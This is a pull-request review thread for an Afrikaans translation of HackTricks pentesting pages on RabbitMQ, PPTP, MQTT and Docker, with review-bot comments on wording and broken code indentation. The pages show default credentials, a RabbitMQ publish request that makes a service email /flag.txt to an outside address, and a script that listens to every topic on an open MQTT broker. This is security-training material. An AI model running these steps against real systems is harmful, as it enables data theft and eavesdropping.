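Review bot: in the IBM MQ testing-environment hunk (`@@ -335,37 +311,33 @@`), `+Hier is die wagkamer se naam ingestel op MYQUEUEMGR (veranderlike MQ_QMGR_NAME).` translates "queue manager name" as `wagkamer` (a waiting room); the same file already uses `Queue Bestuurder` for the queue manager, so use that one term here as well so readers can match it to `MQ_QMGR_NAME`.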
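Review bot: in the Oracle listener hunk the YAML of the HackTricks Automatic Commands block lost its indentation: `+Name: Notes`, `+Description: Notes for Oracle` and `+Note: |` (and the lines under `Entry_2:`) are now flush left, which lifts the nested keys out of `Entry_1:`/`Entry_2:` and breaks the `|` block scalar, so the block no longer parses as the structure the removed `-` lines had; restore that indentation and leave this fence untranslated. Two further points: the top and bottom banners are the same boilerplate but were translated differently within this one hunk (`+Leer AWS-hacking vanaf nul tot held`, `hacktruuks`, `github-repos` at the top versus `+Leer AWS-hacking van nul tot held`, `hacking-truuks`, `GitHub-opslagplekke` at the bottom; the RabbitMQ and PPTP files show the same drift), so translate the banner once and reuse it; and `+Om die MSF-orakelmodules te gebruik, moet u ...` switches to the formal `u` while the rest of the page addresses the reader as `jy`.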
diff --git a/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/network-services-pentesting/15672-pentesting-rabbitmq-management.md index 6f4e8223b..1ef63da09 100644 --- a/network-services-pentesting/15672-pentesting-rabbitmq-management.md +++ b/network-services-pentesting/15672-pentesting-rabbitmq-management.md @@ -1,52 +1,49 @@ -# 15672 - Pentesting RabbitMQ Management +# 15672 - Pentesting RabbitMQ-bestuur
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in 'n **hackingsloopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiende skriftelike en mondelinge Pools vereis_). {% embed url="https://www.stmcyber.com/careers" %} -## Basic Information +## Basiese Inligting -You can learn more about RabbitMQ in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\ -In this port you may find the RabbitMQ Management web console if the [management plugin](https://www.rabbitmq.com/management.html) is enabled.\ -The main page should looks like this: +Jy kan meer oor RabbitMQ leer in [**5671,5672 - Pentesting AMQP**](5671-5672-pentesting-amqp.md).\ +In hierdie poort kan jy die RabbitMQ-bestuurswebkonsol vind as die [bestuursprop](https://www.rabbitmq.com/management.html) geaktiveer is.\ +Die hoofbladsy moet so lyk: ![](<../.gitbook/assets/image (270).png>) -## Enumeration +## Enumerasie -The default credentials are "_**guest**_":"_**guest**_". If they aren't working you may try to [**brute-force the login**](../generic-methodologies-and-resources/brute-force.md#http-post-form). - -To manually start this module you need to execute: +Die verstekgeloofsbriewe is "_**guest**_":"_**guest**_". As dit nie werk nie, kan jy probeer om die aanmelding [**brute force**](../generic-methodologies-and-resources/brute-force.md#http-post-form). 
+Om hierdie module handmatig te begin, moet jy uitvoer: ``` rabbitmq-plugins enable rabbitmq_management service rabbitmq-server restart ``` - -Once you have correctly authenticated you will see the admin console: +Sodra jy korrek geïdentifiseer is, sal jy die administratiewe konsole sien: ![](<../.gitbook/assets/image (271) (1).png>) -Also, if you have valid credentials you may find interesting the information of `http://localhost:15672/api/connections` - -Note also that it's possible to **publish data inside a queue** using the API of this service with a request like: +As jy geldige geloofsbriewe het, sal jy dalk die inligting van `http://localhost:15672/api/connections` interessant vind. +Let ook daarop dat dit moontlik is om **data binne 'n waglyn te publiseer** deur die API van hierdie diens te gebruik met 'n versoek soos: ```bash POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 Host: 172.32.56.72:15672 @@ -57,27 +54,26 @@ Content-Length: 267 {"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"zevtnax+ppp@gmail.com\", \"attachments\": [{\"path\": \"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"} ``` - ### Shodan * `port:15672 http` -If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_). +As jy belangstel in **hacking loopbaan** en die onhackbare wil hack - **ons is aan die werf!** (_vloeiend in Pools skriftelik en mondeling vereis_). {% embed url="https://www.stmcyber.com/careers" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
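Review bot: in the first RabbitMQ hunk, `+Sodra jy korrek geïdentifiseer is, sal jy die administratiewe konsole sien` renders "Once you have correctly authenticated" as "identified"; `geverifieer` is the term, and the distinction matters on a page whose enumeration step is about the login. In the same hunk `+... kan jy probeer om die aanmelding [**brute force**](...)` is missing the infinitive marker (`om die aanmelding te brute-force`), and `bestuursprop` for the management plugin reads as "management plug", where `inprop` is the usual word for plugin (or keep `management plugin` in English as the link text). The unchanged `POST /api/exchanges/%2F/amq.default/publish` request and the Shodan query are correctly left verbatim.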
diff --git a/network-services-pentesting/1723-pentesting-pptp.md b/network-services-pentesting/1723-pentesting-pptp.md index 7daf02ba5..5a49abcdd 100644 --- a/network-services-pentesting/1723-pentesting-pptp.md +++ b/network-services-pentesting/1723-pentesting-pptp.md @@ -2,46 +2,44 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring that the data exchanged remains confidential and protected from unauthorized access. +**Point-to-Point Tunneling Protocol (PPTP)** is 'n metode wat wyd gebruik word vir **afstandsbediening** van mobiele toestelle. Dit maak gebruik van **TCP-poort 1723** vir die uitruil van sleutels, terwyl **IP-protokol 47** (Generic Routing Encapsulation, of **GRE**), gebruik word om die data wat tussen eweknieë oorgedra word, te versleutel. Hierdie opset is noodsaaklik vir die vestiging van 'n veilige kommunikasiekanaal oor die internet, om te verseker dat die uitgeruilde data vertroulik bly en teen ongemagtigde toegang beskerm word. -**Default Port**:1723 - -## Enumeration +**Verstekpoort**: 1723 +## Enumerasie ```bash nmap –Pn -sSV -p1723 ``` - ### [Brute Force](../generic-methodologies-and-resources/brute-force.md#pptp) -## Vulnerabilities +## Kwesbaarhede * [https://www.schneier.com/academic/pptp/](https://www.schneier.com/academic/pptp/) * [https://github.com/moxie0/chapcrack](https://github.com/moxie0/chapcrack)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
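Review bot: `afstandsbediening` in the Basiese Inligting paragraph means "remote control" (as for a TV), whereas "remote access" is `afstandstoegang`. While this paragraph is being rewritten, the carried-over claim that IP protocol 47 (GRE) is used to `versleutel` the data is inaccurate in both languages: GRE only encapsulates the PPP frames, and whatever confidentiality PPTP offers comes from MPPE layered on top, so the paragraph should not present GRE as what makes the channel `veilig` (the Schneier link under Kwesbaarhede is precisely an analysis of how weak that protection is). Also note the unchanged context line `nmap –Pn -sSV -p1723` uses a typographic en dash instead of `-Pn`, which nmap will reject as an unknown option; worth fixing in this PR since the file is being touched anyway.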
diff --git a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index 96ca7e0ee..f8d7a9993 100644 --- a/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -2,69 +2,60 @@
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling van eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial. - -**Default port:** 1883 +**MQ Telemetry Transport (MQTT)** staan bekend as 'n **uitgee/inteken-boodskapprotokol** wat uitstaan vir sy buitengewone eenvoud en ligtheid. Hierdie protokol is spesifiek ontwerp vir omgewings waar toestelle beperkte vermoëns het en oor netwerke werk wat gekenmerk word deur lae bandwydte, hoë latentie of onbetroubare verbindinge. Die kerndoelwitte van MQTT sluit in die minimalisering van die gebruik van netwerkbandwydte en die vermindering van die vraag na toestelhulpbronne. Daarbenewens streef dit daarna om betroubare kommunikasie te handhaaf en 'n sekere vlak van afleweringsversekering te bied. Hierdie doelwitte maak MQTT uiters geskik vir die groeiende veld van **masjien-tot-masjien (M2M) kommunikasie** en die **Internet of Things (IoT)**, waar dit noodsaaklik is om 'n magdom toestelle doeltreffend te koppel. Verder is MQTT baie voordelig vir mobiele toepassings, waar die besparing van bandwydte en batterylewe van kritieke belang is. 
+**Verstekpoort:** 1883 ``` PORT STATE SERVICE REASON 1883/tcp open mosquitto version 1.4.8 syn-ack ``` +## Inspekteer die verkeer -## Inspecting the traffic - -hen a **CONNECT** packet is received by MQTT brokers, a **CONNACK** packet is sent back. This packet contains a return code which is crucial for understanding the connection status. A return code of **0x00** means that the credentials have been accepted, signifying a successful connection. On the other hand, a return code of **0x05** signals that the credentials are invalid, thus preventing the connection. - -For instance, if the broker rejects the connection due to invalid credentials, the scenario would look something like this: +Wanneer 'n **CONNECT** pakkie ontvang word deur MQTT makelaars, word 'n **CONNACK** pakkie teruggestuur. Hierdie pakkie bevat 'n terugvoerkode wat noodsaaklik is vir die verstaan van die verbindingsstatus. 'n Terugvoerkode van **0x00** beteken dat die geloofsbriewe aanvaar is, wat 'n suksesvolle verbinding aandui. Aan die ander kant, 'n terugvoerkode van **0x05** dui daarop dat die geloofsbriewe ongeldig is en dus die verbinding verhoed. +Byvoorbeeld, as die makelaar die verbinding verwerp as gevolg van ongeldige geloofsbriewe, sal die scenario soos volg lyk: ``` { - "returnCode": "0x05", - "description": "Connection Refused, not authorized" +"returnCode": "0x05", +"description": "Connection Refused, not authorized" } ``` - ![](<../.gitbook/assets/image (645) (1).png>) ### [**Brute-Force MQTT**](../generic-methodologies-and-resources/brute-force.md#mqtt) ## Pentesting MQTT -**Authentication is totally optional** and even if authentication is being performed, **encryption is not used by default** (credentials are sent in clear text). MITM attacks can still be executed to steal passwords. 
- -To connect to a MQTT service you can use: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) and subscribe yourself to all the topics doing: +**Verifikasie is heeltemal opsioneel** en selfs as verifikasie uitgevoer word, **word versleuteling nie standaard gebruik nie** (legitimasie-inligting word in duidelike teks gestuur). MITM-aanvalle kan steeds uitgevoer word om wagwoorde te steel. +Om met 'n MQTT-diens te verbind, kan jy gebruik maak van: [https://github.com/bapowell/python-mqtt-client-shell](https://github.com/bapowell/python-mqtt-client-shell) en skryf jouself in vir alle onderwerpe deur die volgende te doen: ``` > connect (NOTICE that you need to indicate before this the params of the connection, by default 127.0.0.1:1883) > subscribe "#" 1 > subscribe "$SYS/#" ``` +Jy kan ook gebruik maak van [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn) -You could also use [**https://github.com/akamai-threat-research/mqtt-pwn**](https://github.com/akamai-threat-research/mqtt-pwn) - -You can also use: - +Jy kan ook gebruik maak van: ```bash apt-get install mosquitto mosquitto-clients mosquitto_sub -t 'test/topic' -v #Subscriribe to 'test/topic' ``` - -Or you could **run this code to try to connect to a MQTT service without authentication, subscribe to every topic and listen them**: - +Of jy kan **hierdie kode uitvoer om te probeer om aan te sluit by 'n MQTT-diens sonder verifikasie, inteken op elke onderwerp en na hulle luister**: ```python #This is a modified version of https://github.com/Warflop/IOT-MQTT-Exploit/blob/master/mqtt.py import paho.mqtt.client as mqtt 
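Review bot: the leading indentation of the `"returnCode"` and `"description"` lines inside the JSON fence was stripped (the `-`/`+` pair differs only in whitespace); a translation should not change the contents of fenced blocks, and the indent showed the object structure. Terminology also drifts within the same hunk: "credentials" is `geloofsbriewe` in the CONNACK paragraph but `legitimasie-inligting` in the Pentesting MQTT paragraph, and "authentication" becomes `verifikasie` (verification) where `outentisering` or `stawing` is the usual term. Pick one rendering per term, so the key point that the broker accepts unauthenticated, cleartext connections by default is stated consistently. The English typo `hen a **CONNECT**` is correctly rendered as `Wanneer 'n **CONNECT**`, good.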
@@ -75,61 +66,60 @@ HOST = "127.0.0.1" PORT = 1883 def on_connect(client, userdata, flags, rc): - client.subscribe('#', qos=1) - client.subscribe('$SYS/#') +client.subscribe('#', qos=1) +client.subscribe('$SYS/#') def on_message(client, userdata, message): - print('Topic: %s | QOS: %s | Message: %s' % (message.topic, message.qos, message.payload)) +print('Topic: %s | QOS: %s | Message: %s' % (message.topic, message.qos, message.payload)) def main(): - client = mqtt.Client() - client.on_connect = on_connect - client.on_message = on_message - client.connect(HOST, PORT) - client.loop_start() - #time.sleep(10) - #client.loop_stop() +client = mqtt.Client() +client.on_connect = on_connect +client.on_message = on_message +client.connect(HOST, PORT) +client.loop_start() +#time.sleep(10) +#client.loop_stop() if __name__ == "__main__": - main() +main() ``` +## Meer inligting -## More information +vanaf hier: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b) -from here: [https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b](https://morphuslabs.com/hacking-the-iot-with-mqtt-8edaf0d07b9b) +### Die Publiseer/Inteken Patroon -### The Publish/Subscribe Pattern +Die publiseer/inteken model bestaan uit: -The publish/subscribe model is composed of: +* **Uitgewer**: publiseer 'n boodskap na een (of baie) onderwerp(e) in die makelaar. +* **Intekenaar**: teken in op een (of baie) onderwerp(e) in die makelaar en ontvang al die boodskappe wat van die uitgewer gestuur word. +* **Makelaar**: roeteer al die boodskappe van die uitgewers na die intekenaars. +* **Onderwerp**: bestaan uit een of meer vlakke wat deur 'n skuinstreep geskei word (bv., /smartshouse/livingroom/temperature). -* **Publisher**: publishes a message to one (or many) topic(s) in the broker. -* **Subscriber**: subscribes to one (or many) topic(s) in the broker and receives all the messages sent from the publisher. 
-* **Broker**: routes all the messages from the publishers to the subscribers. -* **Topic**: consists of one or more levels that are separated by a a forward slash (e.g., /smartshouse/livingroom/temperature). +### Pakketformaat -### Packet Format - -Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header +Elke MQTT-pakket bevat 'n vaste kop (Figuur 02).Figuur 02: Vaste Kop ![https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png](https://miro.medium.com/max/838/1\*k6RkAHEk0576geQGUcKSTA.png) -### Packet Types +### Pakket Tipes -* CONNECT (1): Initiated by the client to request a connection to the server. -* CONNACK (2): The server's acknowledgment of a successful connection. -* PUBLISH (3): Used to send a message from the client to the server or vice versa. -* PUBACK (4): Acknowledgment of a PUBLISH packet. -* PUBREC (5): Part of a message delivery protocol ensuring the message is received. -* PUBREL (6): Further assurance in message delivery, indicating a message release. -* PUBCOMP (7): Final part of the message delivery protocol, indicating completion. -* SUBSCRIBE (8): A client's request to listen for messages from a topic. -* SUBACK (9): The server's acknowledgment of a SUBSCRIBE request. -* UNSUBSCRIBE (10): A client's request to stop receiving messages from a topic. -* UNSUBACK (11): The server's response to an UNSUBSCRIBE request. -* PINGREQ (12): A heartbeat message sent by the client. -* PINGRESP (13): Server's response to the heartbeat message. -* DISCONNECT (14): Initiated by the client to terminate the connection. -* Two values, 0 and 15, are marked as reserved and their use is forbidden. +* CONNECT (1): Geinisieer deur die kliënt om 'n verbinding met die bediener aan te vra. +* CONNACK (2): Die bediener se erkenning van 'n suksesvolle verbinding. +* PUBLISH (3): Gebruik om 'n boodskap van die kliënt na die bediener of omgekeerd te stuur. +* PUBACK (4): Erkenning van 'n PUBLISH-pakket. 
+* PUBREC (5): Deel van 'n boodskap afleweringsprotokol om te verseker dat die boodskap ontvang word. +* PUBREL (6): Verdere versekering in boodskap aflewering, wat 'n boodskap vrystelling aandui. +* PUBCOMP (7): Finale deel van die boodskap afleweringsprotokol, wat voltooiing aandui. +* SUBSCRIBE (8): 'n Kliënt se versoek om na boodskappe van 'n onderwerp te luister. +* SUBACK (9): Die bediener se erkenning van 'n SUBSCRIBE versoek. +* UNSUBSCRIBE (10): 'n Kliënt se versoek om op te hou om boodskappe van 'n onderwerp te ontvang. +* UNSUBACK (11): Die bediener se reaksie op 'n UNSUBSCRIBE versoek. +* PINGREQ (12): 'n Hartklopboodskap wat deur die kliënt gestuur word. +* PINGRESP (13): Die bediener se reaksie op die hartklopboodskap. +* DISCONNECT (14): Geinisieer deur die kliënt om die verbinding te beëindig. +* Twee waardes, 0 en 15, word as voorbehou gemerk en hul gebruik is verbode. ## Shodan @@ -138,14 +128,14 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
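Review bot: the Python example is broken by the `@@ -75,61 +66,60 @@` hunk: the bodies of `on_connect`, `on_message`, `main` and the `if __name__ == "__main__":` block lost their indentation (`-    client.subscribe('#', qos=1)` became `+client.subscribe('#', qos=1)`, `-    main()` became `+main()`), so the snippet now raises `IndentationError` and no longer runs at all. Restore the original indentation; fenced code must pass through the translation unchanged. Minor: `Geinisieer` should be `Geïnisieer` in the CONNECT and DISCONNECT items, and the missing space in `(Figuur 02).Figuur 02: Vaste Kop` is carried over from the English `(Figure 02).Figure 02`; since the line is being rewritten, separate the sentence from the caption.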
diff --git a/network-services-pentesting/2375-pentesting-docker.md b/network-services-pentesting/2375-pentesting-docker.md index 18dfc2dae..94686f5ba 100644 --- a/network-services-pentesting/2375-pentesting-docker.md +++ b/network-services-pentesting/2375-pentesting-docker.md @@ -1,34 +1,32 @@ -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** 